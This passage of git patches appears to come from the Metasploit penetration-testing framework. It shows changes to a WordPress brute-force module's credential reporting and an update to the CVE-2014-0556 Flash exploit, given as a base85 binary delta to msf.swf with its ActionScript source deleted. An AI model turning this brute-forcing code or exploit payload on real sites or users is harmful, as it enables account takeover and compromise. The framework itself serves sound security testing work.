+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+
   def validate_user(user=nil)
     print_status("#{target_uri} - WordPress User-Validation - Checking Username:'#{user}'")
 
     exists = wordpress_user_exists?(user)
     if exists
       print_good("#{target_uri} - WordPress User-Validation - Username: '#{user}' - is VALID")
-      report_auth_info(
-          :host => rhost,
-          :sname => (ssl ? 'https' : 'http'),
-          :user => user,
-          :port => rport,
-          :proof => "WEBAPP=\"Wordpress\", VHOST=#{vhost}"
+
+      report_cred(
+        ip: rhost,
+        port: rport,
+        user: user
       )
 
       @users_found[user] = :reported
@@ -130,15 +161,14 @@ class Metasploit3 < Msf::Auxiliary
 
     if cookie
       print_good("#{target_uri} - WordPress Brute Force - SUCCESSFUL login for '#{user}' : '#{pass}'")
-      report_auth_info(
-          :host => rhost,
-          :port => rport,
-          :sname => (ssl ? 'https' : 'http'),
-          :user => user,
-          :pass => pass,
-          :proof => "WEBAPP=\"Wordpress\", VHOST=#{vhost}, COOKIE=#{cookie}",
-          :active => true
+
+      report_cred(
+        ip: rhost,
+        port: rport,
+        user: user,
+        password: pass
       )
+
       return :next_user
     else
       vprint_error("#{target_uri} - WordPress Brute Force - Failed to login as '#{user}'")

From 02181addc5e4cdb143d08591be9f5710dfdb435d Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 4 Jun 2015 18:23:50 -0500
Subject: [PATCH 0316/1013] Update CVE-2014-0556

---
 data/exploits/CVE-2014-0556/msf.swf           | Bin 17720 -> 20719 bytes
 .../source/exploits/CVE-2014-0556/Main.as     | 185 ------------------
 .../adobe_flash_net_connection_confusion.rb   |   2 +-
 .../adobe_flash_uncompress_zlib_uaf.rb        |   2 +-
 .../adobe_flash_copy_pixels_to_byte_array.rb  |  21 +-
 5 files changed, 14 insertions(+), 196 deletions(-)
 mode change 100755 => 100644 data/exploits/CVE-2014-0556/msf.swf
 delete mode 100755 external/source/exploits/CVE-2014-0556/Main.as

diff --git a/data/exploits/CVE-2014-0556/msf.swf b/data/exploits/CVE-2014-0556/msf.swf
old mode 100755
new mode 100644
index f6483bd08741f6e2d275d8e95e7cce77be244500..3cf2bc3d4f3050303018392bb865b230ac076125
GIT binary patch
delta 20599
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
